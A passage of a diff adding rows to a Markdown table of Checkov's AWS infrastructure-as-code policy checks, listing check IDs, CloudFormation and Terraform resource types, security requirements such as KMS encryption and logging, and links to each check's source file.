+| 522 | CKV_AWS_156 | resource | AWS::WorkSpaces::Workspace | Ensure that Workspace root volumes are encrypted | Cloudformation | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) |
+| 523 | CKV_AWS_156 | resource | aws_workspaces_workspace | Ensure that Workspace root volumes are encrypted | Terraform | [WorkspaceRootVolumeEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WorkspaceRootVolumeEncrypted.py) |
+| 524 | CKV_AWS_157 | resource | AWS::RDS::DBInstance | Ensure that RDS instances have Multi-AZ enabled | Cloudformation | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSMultiAZEnabled.py) |
+| 525 | CKV_AWS_157 | resource | aws_db_instance | Ensure that RDS instances have Multi-AZ enabled | Terraform | [RDSMultiAZEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSMultiAZEnabled.py) |
+| 526 | CKV_AWS_158 | resource | AWS::Logs::LogGroup | Ensure that CloudWatch Log Group is encrypted by KMS | Cloudformation | [CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudWatchLogGroupKMSKey.py) |
+| 527 | CKV_AWS_158 | resource | aws_cloudwatch_log_group | Ensure that CloudWatch Log Group is encrypted by KMS | Terraform | 
[CloudWatchLogGroupKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudWatchLogGroupKMSKey.py) |
+| 528 | CKV_AWS_159 | resource | aws_athena_workgroup | Ensure that Athena Workgroup is encrypted | Terraform | [AthenaWorkgroupEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AthenaWorkgroupEncryption.py) |
+| 529 | CKV_AWS_160 | resource | AWS::Timestream::Database | Ensure that Timestream database is encrypted with KMS CMK | Cloudformation | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TimestreamDatabaseKMSKey.py) |
+| 530 | CKV_AWS_160 | resource | aws_timestreamwrite_database | Ensure that Timestream database is encrypted with KMS CMK | Terraform | [TimestreamDatabaseKMSKey.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TimestreamDatabaseKMSKey.py) |
+| 531 | CKV_AWS_161 | resource | AWS::RDS::DBInstance | Ensure RDS database has IAM authentication enabled | Cloudformation | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSIAMAuthentication.py) |
+| 532 | CKV_AWS_161 | resource | aws_db_instance | Ensure RDS database has IAM authentication enabled | Terraform | [RDSIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSIAMAuthentication.py) |
+| 533 | CKV_AWS_162 | resource | AWS::RDS::DBCluster | Ensure RDS cluster has IAM authentication enabled | Cloudformation | [RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/RDSClusterIAMAuthentication.py) |
+| 534 | CKV_AWS_162 | resource | aws_rds_cluster | Ensure RDS cluster has IAM authentication enabled | Terraform | 
[RDSClusterIAMAuthentication.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSClusterIAMAuthentication.py) |
+| 535 | CKV_AWS_163 | resource | AWS::ECR::Repository | Ensure ECR image scanning on push is enabled | Cloudformation | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/ECRImageScanning.py) |
+| 536 | CKV_AWS_163 | resource | aws_ecr_repository | Ensure ECR image scanning on push is enabled | Terraform | [ECRImageScanning.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECRImageScanning.py) |
+| 537 | CKV_AWS_164 | resource | AWS::Transfer::Server | Ensure Transfer Server is not exposed publicly. | Cloudformation | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/TransferServerIsPublic.py) |
+| 538 | CKV_AWS_164 | resource | aws_transfer_server | Ensure Transfer Server is not exposed publicly. 
| Terraform | [TransferServerIsPublic.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/TransferServerIsPublic.py) |
+| 539 | CKV_AWS_165 | resource | AWS::DynamoDB::GlobalTable | Ensure DynamoDB global table point in time recovery (backup) is enabled | Cloudformation | [DynamodbGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/DynamodbGlobalTableRecovery.py) |
+| 540 | CKV_AWS_165 | resource | aws_dynamodb_global_table | Ensure DynamoDB point in time recovery (backup) is enabled for global tables | Terraform | [DynamoDBGlobalTableRecovery.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DynamoDBGlobalTableRecovery.py) |
+| 541 | CKV_AWS_166 | resource | AWS::Backup::BackupVault | Ensure Backup Vault is encrypted at rest using KMS CMK | Cloudformation | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/BackupVaultEncrypted.py) |
+| 542 | CKV_AWS_166 | resource | aws_backup_vault | Ensure Backup Vault is encrypted at rest using KMS CMK | Terraform | [BackupVaultEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BackupVaultEncrypted.py) |
+| 543 | CKV_AWS_167 | resource | aws_glacier_vault | Ensure Glacier Vault access policy is not public by only allowing specific services or principals to access it | Terraform | [GlacierVaultAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlacierVaultAnyPrincipal.py) |
+| 544 | CKV_AWS_168 | resource | aws_sqs_queue | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) |
+| 545 | CKV_AWS_168 | 
resource | aws_sqs_queue_policy | Ensure SQS queue policy is not public by only allowing specific services or principals to access it | Terraform | [SQSQueuePolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SQSQueuePolicyAnyPrincipal.py) |
+| 546 | CKV_AWS_169 | resource | aws_sns_topic_policy | Ensure SNS topic policy is not public by only allowing specific services or principals to access it | Terraform | [SNSTopicPolicyAnyPrincipal.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SNSTopicPolicyAnyPrincipal.py) |
+| 547 | CKV_AWS_170 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Cloudformation | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerPermissionsMode.py) |
+| 548 | CKV_AWS_170 | resource | aws_qldb_ledger | Ensure QLDB ledger permissions mode is set to STANDARD | Terraform | [QLDBLedgerPermissionsMode.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerPermissionsMode.py) |
+| 549 | CKV_AWS_171 | resource | aws_emr_security_configuration | Ensure EMR Cluster security configuration encryption is using SSE-KMS | Terraform | [EMRClusterIsEncryptedKMS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EMRClusterIsEncryptedKMS.py) |
+| 550 | CKV_AWS_172 | resource | AWS::QLDB::Ledger | Ensure QLDB ledger has deletion protection enabled | Cloudformation | [QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/QLDBLedgerDeletionProtection.py) |
+| 551 | CKV_AWS_172 | resource | aws_qldb_ledger | Ensure QLDB ledger has deletion protection enabled | Terraform | 
[QLDBLedgerDeletionProtection.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/QLDBLedgerDeletionProtection.py) | +| 552 | CKV_AWS_173 | resource | AWS::Lambda::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 553 | CKV_AWS_173 | resource | AWS::Serverless::Function | Check encryption settings for Lambda environment variable | Cloudformation | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 554 | CKV_AWS_173 | resource | aws_lambda_function | Check encryption settings for Lambda environmental variable | Terraform | [LambdaEnvironmentEncryptionSettings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LambdaEnvironmentEncryptionSettings.py) | +| 555 | CKV_AWS_174 | resource | AWS::CloudFront::Distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Cloudformation | [CloudFrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/CloudFrontTLS12.py) | +| 556 | CKV_AWS_174 | resource | aws_cloudfront_distribution | Verify CloudFront Distribution Viewer Certificate is using TLS v1.2 | Terraform | [CloudfrontTLS12.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontTLS12.py) | +| 557 | CKV_AWS_175 | resource | aws_waf_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 558 | CKV_AWS_175 | resource | aws_wafregional_web_acl | Ensure WAF has associated rules | Terraform | 
[WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 559 | CKV_AWS_175 | resource | aws_wafv2_web_acl | Ensure WAF has associated rules | Terraform | [WAFHasAnyRules.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasAnyRules.py) | +| 560 | CKV_AWS_176 | resource | aws_waf_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 561 | CKV_AWS_176 | resource | aws_wafregional_web_acl | Ensure Logging is enabled for WAF Web Access Control Lists | Terraform | [WAFHasLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFHasLogs.py) | +| 562 | CKV_AWS_177 | resource | aws_kinesis_video_stream | Ensure Kinesis Video Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisVideoEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisVideoEncryptedWithCMK.py) | +| 563 | CKV_AWS_178 | resource | aws_fsx_ontap_file_system | Ensure fx ontap file system is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOntapFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOntapFSEncryptedWithCMK.py) | +| 564 | CKV_AWS_179 | resource | aws_fsx_windows_file_system | Ensure FSX Windows filesystem is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXWindowsFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXWindowsFSEncryptedWithCMK.py) | +| 565 | CKV_AWS_180 | resource | aws_imagebuilder_component | Ensure Image Builder component is encrypted by KMS using a customer managed Key (CMK) | Terraform | 
[ImagebuilderComponentEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderComponentEncryptedWithCMK.py) | +| 566 | CKV_AWS_181 | resource | aws_s3_object_copy | Ensure S3 Object Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3ObjectCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3ObjectCopyEncryptedWithCMK.py) | +| 567 | CKV_AWS_182 | resource | aws_docdb_cluster | Ensure DocumentDB is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DocDBEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DocDBEncryptedWithCMK.py) | +| 568 | CKV_AWS_183 | resource | aws_ebs_snapshot_copy | Ensure EBS Snapshot Copy is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSSnapshotCopyEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSSnapshotCopyEncryptedWithCMK.py) | +| 569 | CKV_AWS_184 | resource | aws_efs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EFSFileSystemEncryptedWithCMK.py) | +| 570 | CKV_AWS_185 | resource | aws_kinesis_stream | Ensure Kinesis Stream is encrypted by KMS using a customer managed Key (CMK) | Terraform | [KinesisStreamEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KinesisStreamEncryptedWithCMK.py) | +| 571 | CKV_AWS_186 | resource | aws_s3_bucket_object | Ensure S3 bucket Object is encrypted by KMS using a customer managed Key (CMK) | Terraform | [S3BucketObjectEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/S3BucketObjectEncryptedWithCMK.py) | +| 572 
| CKV_AWS_187 | resource | AWS::SageMaker::Domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 573 | CKV_AWS_187 | resource | AWS::SageMaker::NotebookInstance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Cloudformation | [SagemakerNotebookEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/SagemakerNotebookEncryptedWithCMK.py) | +| 574 | CKV_AWS_187 | resource | aws_sagemaker_domain | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 575 | CKV_AWS_187 | resource | aws_sagemaker_notebook_instance | Ensure Sagemaker domain and notebook instance are encrypted by KMS using a customer managed Key (CMK) | Terraform | [SagemakerDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/SagemakerDomainEncryptedWithCMK.py) | +| 576 | CKV_AWS_189 | resource | aws_ebs_volume | Ensure EBS Volume is encrypted by KMS using a customer managed Key (CMK) | Terraform | [EBSVolumeEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/EBSVolumeEncryptedWithCMK.py) | +| 577 | CKV_AWS_190 | resource | aws_fsx_lustre_file_system | Ensure lustre file systems is encrypted by KMS using a customer managed Key (CMK) | Terraform | [LustreFSEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/LustreFSEncryptedWithCMK.py) | +| 578 | 
CKV_AWS_191 | resource | aws_elasticache_replication_group | Ensure ElastiCache replication group is encrypted by KMS using a customer managed Key (CMK) | Terraform | [ElasticacheReplicationGroupEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheReplicationGroupEncryptedWithCMK.py) | +| 579 | CKV_AWS_192 | resource | AWS::WAFv2::WebACL | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Cloudformation | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/WAFACLCVE202144228.py) | +| 580 | CKV_AWS_192 | resource | aws_wafv2_web_acl | Ensure WAF prevents message lookup in Log4j2. See CVE-2021-44228 aka log4jshell | Terraform | [WAFACLCVE202144228.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/WAFACLCVE202144228.py) | +| 581 | CKV_AWS_193 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Logging enabled | Cloudformation | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncLogging.py) | +| 582 | CKV_AWS_193 | resource | aws_appsync_graphql_api | Ensure AppSync has Logging enabled | Terraform | [AppSyncLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncLogging.py) | +| 583 | CKV_AWS_194 | resource | AWS::AppSync::GraphQLApi | Ensure AppSync has Field-Level logs enabled | Cloudformation | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 584 | CKV_AWS_194 | resource | aws_appsync_graphql_api | Ensure AppSync has Field-Level logs enabled | Terraform | [AppSyncFieldLevelLogs.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppSyncFieldLevelLogs.py) | +| 585 | CKV_AWS_195 | resource | 
AWS::Glue::Crawler | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 586 | CKV_AWS_195 | resource | AWS::Glue::DevEndpoint | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 587 | CKV_AWS_195 | resource | AWS::Glue::Job | Ensure Glue component has a security configuration associated | Cloudformation | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 588 | CKV_AWS_195 | resource | aws_glue_crawler | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 589 | CKV_AWS_195 | resource | aws_glue_dev_endpoint | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 590 | CKV_AWS_195 | resource | aws_glue_job | Ensure Glue component has a security configuration associated | Terraform | [GlueSecurityConfigurationEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/GlueSecurityConfigurationEnabled.py) | +| 591 | CKV_AWS_196 | resource | aws_elasticache_security_group | Ensure no aws_elasticache_security_group resources exist | Terraform | 
[ElasticacheHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ElasticacheHasSecurityGroup.py) | +| 592 | CKV_AWS_197 | resource | AWS::AmazonMQ::Broker | Ensure MQ Broker Audit logging is enabled | Cloudformation | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/cloudformation/checks/resource/aws/MQBrokerAuditLogging.py) | +| 593 | CKV_AWS_197 | resource | aws_mq_broker | Ensure MQ Broker Audit logging is enabled | Terraform | [MQBrokerAuditLogging.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerAuditLogging.py) | +| 594 | CKV_AWS_198 | resource | aws_db_security_group | Ensure no aws_db_security_group resources exist | Terraform | [RDSHasSecurityGroup.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSHasSecurityGroup.py) | +| 595 | CKV_AWS_199 | resource | aws_imagebuilder_distribution_configuration | Ensure Image Builder Distribution Configuration encrypts AMI's using KMS - a customer managed Key (CMK) | Terraform | [ImagebuilderDistributionConfigurationEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderDistributionConfigurationEncryptedWithCMK.py) | +| 596 | CKV_AWS_200 | resource | aws_imagebuilder_image_recipe | Ensure that Image Recipe EBS Disk are encrypted with CMK | Terraform | [ImagebuilderImageRecipeEBSEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ImagebuilderImageRecipeEBSEncrypted.py) | +| 597 | CKV_AWS_201 | resource | aws_memorydb_cluster | Ensure MemoryDB is encrypted at rest using KMS CMKs | Terraform | [MemoryDBEncryptionWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBEncryptionWithCMK.py) | +| 598 | CKV_AWS_202 | resource | aws_memorydb_cluster | Ensure MemoryDB data is 
encrypted in transit | Terraform | [MemoryDBClusterIntransitEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MemoryDBClusterIntransitEncryption.py) | +| 599 | CKV_AWS_203 | resource | aws_fsx_openzfs_file_system | Ensure resource is encrypted by KMS using a customer managed Key (CMK) | Terraform | [FSXOpenZFSFileSystemEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/FSXOpenZFSFileSystemEncryptedWithCMK.py) | +| 600 | CKV_AWS_204 | resource | aws_ami | Ensure AMIs are encrypted using KMS CMKs | Terraform | [AMIEncryption.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMIEncryption.py) | +| 601 | CKV_AWS_205 | resource | aws_ami_launch_permission | Ensure to Limit AMI launch Permissions | Terraform | [AMILaunchIsShared.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AMILaunchIsShared.py) | +| 602 | CKV_AWS_206 | resource | aws_api_gateway_domain_name | Ensure API Gateway Domain uses a modern security Policy | Terraform | [APIGatewayDomainNameTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDomainNameTLS.py) | +| 603 | CKV_AWS_207 | resource | aws_mq_broker | Ensure MQ Broker minor version updates are enabled | Terraform | [MQBrokerMinorAutoUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerMinorAutoUpgrade.py) | +| 604 | CKV_AWS_208 | resource | aws_mq_broker | Ensure MQ Broker version is current | Terraform | [MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 605 | CKV_AWS_208 | resource | aws_mq_configuration | Ensure MQ Broker version is current | Terraform | 
[MQBrokerVersion.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerVersion.py) | +| 606 | CKV_AWS_209 | resource | aws_mq_broker | Ensure MQ broker encrypted by KMS using a customer managed Key (CMK) | Terraform | [MQBrokerEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/MQBrokerEncryptedWithCMK.py) | +| 607 | CKV_AWS_210 | resource | aws_batch_job_definition | Batch job does not define a privileged container | Terraform | [BatchJobIsNotPrivileged.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/BatchJobIsNotPrivileged.py) | +| 608 | CKV_AWS_211 | resource | aws_db_instance | Ensure RDS uses a modern CaCert | Terraform | [RDSCACertIsRecent.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/RDSCACertIsRecent.py) | +| 609 | CKV_AWS_212 | resource | aws_dms_replication_instance | Ensure DMS replication instance is encrypted by KMS using a customer managed Key (CMK) | Terraform | [DMSReplicationInstanceEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceEncryptedWithCMK.py) | +| 610 | CKV_AWS_213 | resource | aws_load_balancer_policy | Ensure ELB Policy uses only secure protocols | Terraform | [ELBPolicyUsesSecureProtocols.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ELBPolicyUsesSecureProtocols.py) | +| 611 | CKV_AWS_214 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted at rest | Terraform | [AppsyncAPICacheEncryptionAtRest.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionAtRest.py) | +| 612 | CKV_AWS_215 | resource | aws_appsync_api_cache | Ensure AppSync API Cache is encrypted in transit | Terraform | 
[AppsyncAPICacheEncryptionInTransit.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/AppsyncAPICacheEncryptionInTransit.py) | +| 613 | CKV_AWS_216 | resource | aws_cloudfront_distribution | Ensure CloudFront distribution is enabled | Terraform | [CloudfrontDistributionEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudfrontDistributionEnabled.py) | +| 614 | CKV_AWS_217 | resource | aws_api_gateway_deployment | Ensure Create before destroy for API deployments | Terraform | [APIGatewayDeploymentCreateBeforeDestroy.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayDeploymentCreateBeforeDestroy.py) | +| 615 | CKV_AWS_218 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using latest TLS | Terraform | [CloudsearchDomainTLS.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainTLS.py) | +| 616 | CKV_AWS_219 | resource | aws_codepipeline | Ensure CodePipeline Artifact store is using a KMS CMK | Terraform | [CodePipelineArtifactsEncrypted.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodePipelineArtifactsEncrypted.py) | +| 617 | CKV_AWS_220 | resource | aws_cloudsearch_domain | Ensure that CloudSearch is using https | Terraform | [CloudsearchDomainEnforceHttps.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CloudsearchDomainEnforceHttps.py) | +| 618 | CKV_AWS_221 | resource | aws_codeartifact_domain | Ensure CodeArtifact Domain is encrypted by KMS using a customer managed Key (CMK) | Terraform | [CodeArtifactDomainEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/CodeArtifactDomainEncryptedWithCMK.py) | +| 619 | CKV_AWS_222 | resource | aws_dms_replication_instance | Ensure DMS replication instance gets all 
minor upgrade automatically | Terraform | [DMSReplicationInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DMSReplicationInstanceMinorUpgrade.py) | +| 620 | CKV_AWS_223 | resource | aws_ecs_cluster | Ensure ECS Cluster enables logging of ECS Exec | Terraform | [ECSClusterLoggingEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEnabled.py) | +| 621 | CKV_AWS_224 | resource | aws_ecs_cluster | Ensure ECS Cluster logging uses CMK | Terraform | [ECSClusterLoggingEncryptedWithCMK.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/ECSClusterLoggingEncryptedWithCMK.py) | +| 622 | CKV_AWS_225 | resource | aws_api_gateway_method_settings | Ensure API Gateway method setting caching is enabled | Terraform | [APIGatewayMethodSettingsCacheEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/APIGatewayMethodSettingsCacheEnabled.py) | +| 623 | CKV_AWS_226 | resource | aws_db_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 624 | CKV_AWS_226 | resource | aws_rds_cluster_instance | Ensure DB instance gets all minor upgrades automatically | Terraform | [DBInstanceMinorUpgrade.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/DBInstanceMinorUpgrade.py) | +| 625 | CKV_AWS_227 | resource | aws_kms_key | Ensure KMS key is enabled | Terraform | [KMSKeyIsEnabled.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/terraform/checks/resource/aws/KMSKeyIsEnabled.py) | +| 626 | CKV_AWS_228 | resource | aws_elasticsearch_domain | Verify Elasticsearch domain is using an up to date TLS policy | Terraform | 
